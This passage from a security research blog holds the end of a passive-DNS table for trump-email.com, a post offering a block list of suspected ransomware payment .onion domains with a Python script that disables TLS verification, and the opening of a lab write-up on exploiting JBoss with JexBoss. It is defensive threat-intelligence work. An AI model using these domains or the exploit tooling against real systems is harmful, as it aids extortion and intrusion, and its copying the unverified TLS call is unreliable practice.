<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_TXT_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">TXT</span></a></tt></td><td><tt><span style="color: #20124d;">"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">17</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-05-07 03:06:37 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 05:43:42 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_www.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">www.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_www.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:36 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">4</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-05-07 03:06:37 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 12:10:41 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_mx3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">mx3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">119</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2012-12-19 15:37:59 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2013-07-12 18:14:52 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY__client._smtp.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">_client._smtp.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME__client._smtp.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">8</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 23:40:31 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-16 22:30:04 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">links.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">163659</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-05 07:37:16 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-22 19:45:03 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">links.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_customers.listrak.com." style="text-decoration: none;"><span style="color: #20124d;">customers.listrak.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">20608</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-02 19:20:22 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-13 01:47:56 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail1.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_66.216.133.29" style="text-decoration: none;"><span style="color: #20124d;">66.216.133.29</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">57</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 04:32:26 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 00:15:59 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail1.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:41 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:41 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail2.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail2.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail2.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_ctudgrekow.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">ctudgrekow.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_ctudgrekow.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:46 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:46 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_dw6w3yzfw6.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">dw6w3yzfw6.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_dw6w3yzfw6.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">5</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_i6myzht210.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">i6myzht210.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_i6myzht210.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">5</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-15 22:45:24 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-15 22:45:24 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_k8v362jbh7.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">k8v362jbh7.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_k8v362jbh7.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:59:55 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:59:55 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_s4ddlkd49j.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">s4ddlkd49j.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_s4ddlkd49j.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:56:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:56:36 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_t59hykhmfc.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">t59hykhmfc.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_t59hykhmfc.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_thej35t3rpwns.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">thej35t3rpwns.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_thej35t3rpwns.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
</tbody><thead>
<tr id="querystatus" style="font-weight: bold;"><td colspan="3">Returned 30 RRsets in 0.04 seconds.</td></tr>
<tr><td></td></tr>
</thead></table>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo}
</style></div>
Mila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.com2tag:blogger.com,1999:blog-74827929652568895.post-54782531517620247342017-01-10T20:09:00.001-05:002017-01-10T20:23:20.213-05:00Threat Intel - Ransomware Payment Sites Feed<br />
There are a number of great sites dedicated to Ransom ware threat feeds. Those with the most value include the Download/Dropper site or the C2 Site.<br />
<br />
These lists of observables can help Incident Response teams, by limiting the spread throughout their local environments.<br />
<br />
Unfortunately though, malware authors will frequently slip in under the radar, and we find individual users try to rectify the problem on their own. They will visit the payment site and pay the ransom, which keeps IT Teams in the dark. Regardless of what side of the debate you're on, hiding the ransom payment makes it hard for teams to build counter measures or even understand they have a problem. <br />
<br />
Using a spare RaspberryPi, we've started mapping out ransom ware domains. Our project operationalizes data from Harry71, Ahmia and VisiTOR. Their excellent work in mapping TOR makes this feed possible. Finally, as we stumble upon malware samples and perform analysis, the results of that analysis is fed into the tool.<br />
<br />
After enumerating the .onion sites, we combine the data with known Web2Tor gateways that are commonly used by malware authors, and compile a suggested notification or block list.<br />
<br />
Because our research is largely automated, there may be occasional legitimate .onion sites on the list. We do our very best to screen and remove these quickly.<br />
<br />
Our goal is to combine this useful data into actionable indicators of warning for IT/IR teams to use in their IDS or SIEM. Ideally you would never see these observables in your environment; but if they hit it is important to act on them immediately.<br />
<br />
<br />
For example, here is a snippet of a feed generated on December 25, 2016:<br />
<br />
<blockquote class="tr_bq">
# Ransomware Payment Sites on TOR.<br />
# List provided with no warranty by DeepEndResearch.<br />
# Commercial use with permission only.<br />
# There may be false positives in this list. It should be used as an Indicator of Warning list only.<br />
# This file is updated daily.<br />
qli26fihoid5qwo5.onion<br />
qli26fihoid5qwo5.anonym.to<br />
qli26fihoid5qwo5.hiddenservice.net<br />
qli26fihoid5qwo5.onion.cab<br />
qli26fihoid5qwo5.onion.nu<br />
qli26fihoid5qwo5.onion.to<br />
qli26fihoid5qwo5.s1.tor-gateways.de<br />
qli26fihoid5qwo5.s2.tor-gateways.de<br />
qli26fihoid5qwo5.s3.tor-gateways.de<br />
qli26fihoid5qwo5.s4.tor-gateways.de<br />
qli26fihoid5qwo5.s5.tor-gateways.de<br />
qli26fihoid5qwo5.tor2web.fi<br />
qli26fihoid5qwo5.onion?lang=de<br />
qli26fihoid5qwo5.anonym.to<br />
qli26fihoid5qwo5.hiddenservice.net<br />
qli26fihoid5qwo5.onion.cab<br />
qli26fihoid5qwo5.onion.nu<br />
qli26fihoid5qwo5.onion.to<br />
qli26fihoid5qwo5.s1.tor-gateways.de<br />
qli26fihoid5qwo5.s2.tor-gateways.de<br />
qli26fihoid5qwo5.s3.tor-gateways.de<br />
qli26fihoid5qwo5.s4.tor-gateways.de<br />
qli26fihoid5qwo5.s5.tor-gateways.de<br />
qli26fihoid5qwo5.tor2web.fi</blockquote>
<br />
Our feed is updated daily and posted here:<br />
<br />
https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt<br />
<br />
We make several attempts to remove sites that are no longer operational within 24-48 hours.<br />
<br />
<br />
One way you may try to operationalize this data, in a <a href="http://splunk.com/">Splunk</a> environment:<br />
Convert the feed to a CSV file (set this as a daily Cron in your Splunk Search Head):<br />
<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
#!/usr/bin/python</blockquote>
<blockquote class="tr_bq">
import requests</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
if __name__ == '__main__':</blockquote>
<blockquote class="tr_bq">
ioc = []</blockquote>
<blockquote class="tr_bq">
feed_file = requests.get('https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt', verify=False).content</blockquote>
<blockquote class="tr_bq">
outfile = 'domain,notes\n'</blockquote>
<blockquote class="tr_bq">
for line in feed_file.splitlines():</blockquote>
<blockquote class="tr_bq">
if line.startswith('#') or '.' not in line:</blockquote>
<blockquote class="tr_bq">
continue</blockquote>
<blockquote class="tr_bq">
outfile += '%s,DeepEndResearch Suspected Ransomware Payment Site\n' % line</blockquote>
<blockquote class="tr_bq">
with open('ransomware_payment_site.csv', 'w') as fh:</blockquote>
<blockquote class="tr_bq">
fh.write(outfile)</blockquote>
</blockquote>
Then set a query using the <a href="https://docs.splunk.com/Documentation/Splunk/6.5.1/SearchReference/Inputlookup">inputlookup</a> option at a schedule that works for your environment.<br />
<br />
We hope that you find this feed useful. Please feel free to comment or offer us suggestions!Anonymoushttp://www.blogger.com/profile/06184797257846704907noreply@blogger.comtag:blogger.com,1999:blog-74827929652568895.post-37356227989626791172016-04-12T22:10:00.000-04:002016-04-12T22:23:55.339-04:00JBoss exploits - View from a Victim<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;"><span style="font-size:4em; line-height: normal; word-spacing:0.3em;"><span style="background:#64d99a;color:#000000;font-family:'Times New Roman', Times, serif; font-size:xx-large; font-weight:bold; font-style:italic; box-shadow:-1px 1px 2px #333; text-transform:uppercase; line-height:125%; text-decoration:underline; margin:0.1em; padding:0.1em; vertical-align:0.1em; ">J</span><span style="background:#64e9fa;color:#000000;font-family:'Impact', Charcoal, sans-serif; font-size:xx-large; font-style:italic; box-shadow:1px 1px 2px #333; text-transform:lowercase; line-height:75%; text-decoration:overline; margin:0.1em; padding:0.2em; vertical-align:-0.1em; ">B</span><span style="background:#baa01c;color:#000000;font-family:'Verdana', Geneva, sans-serif; font-size:xx-large; font-weight:bolder; text-transform:lowercase; line-height:75%; text-decoration:overline; margin:0.1em; padding:0.3em; vertical-align:baseline; ">O</span><span style="background:#999999;color:#000000;font-family:'Times New Roman', Times, serif; font-size:x-large; font-weight:lighter; font-style:italic; box-shadow:-1px -1px 2px #333; text-transform:uppercase; line-height:125%; text-decoration:underline; margin:0.1em; padding:0.1em; text-shadow:-1px -1px 1px; vertical-align:-0.1em; ">S</span><span style="background:#b8e683;color:#020301;font-family:'Trebuchet MS', Helvetica, sans-serif; font-size:xx-large; font-weight:bolder; box-shadow:-1px -1px 2px #333; text-transform:uppercase; line-height:75%; margin:0.1em; padding:0.3em; vertical-align:-0.1em; ">S</span></span><p>
Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.</div>
<div style="text-align: justify;">
Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.</div>
<div style="text-align: justify;">
Exploits against <a href="https://en.wikipedia.org/wiki/JBoss_Enterprise_Application_Platform" target="_blank">JBoss</a> are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "<a href="http://blog.talosintel.com/2016/03/samsam-ransomware.html#more" target="_blank">SamSam: The Doctor Will See You, After He Pays the Ransom</a>"</div>
<div style="text-align: justify;">
Note that "<b>JexBoss</b>" is described as the exploit tool of choice. JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments. </div>
<div style="text-align: justify;">
It can be safe to assume that many of these deployments likely remain vulnerable.</div>
<div style="text-align: justify;">
While healthcare and hospitals are the target 'du jour', other high profile industry segments running old JBoss, may be targeted next.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.</div>
<div style="text-align: justify;">
We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim. We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Our test environment consisted of two Amazon EC2 instances running RedHat linux. I configured the first instance to run JBoss v6, and the other to run JBoss v4.</div>
<div style="text-align: justify;">
Please don't bother to test or "attack" the EC2 instances I used. They are firewalled to the world, except to my IP :)</div>
<div style="text-align: justify;">
The attacking environment was a simple Debian linux VM with JexBoss installed.</div>
<br />
<h3 style="text-align: left;">
<u>Attacking JBoss 4</u></h3>
<div>
<div style="text-align: justify;">
Running JexBoss against a vulnerable host is quite trivial. You simply provide the URL of the JBoss instance, and hit Enter.</div>
<div style="text-align: justify;">
The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet as being vulnerable.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
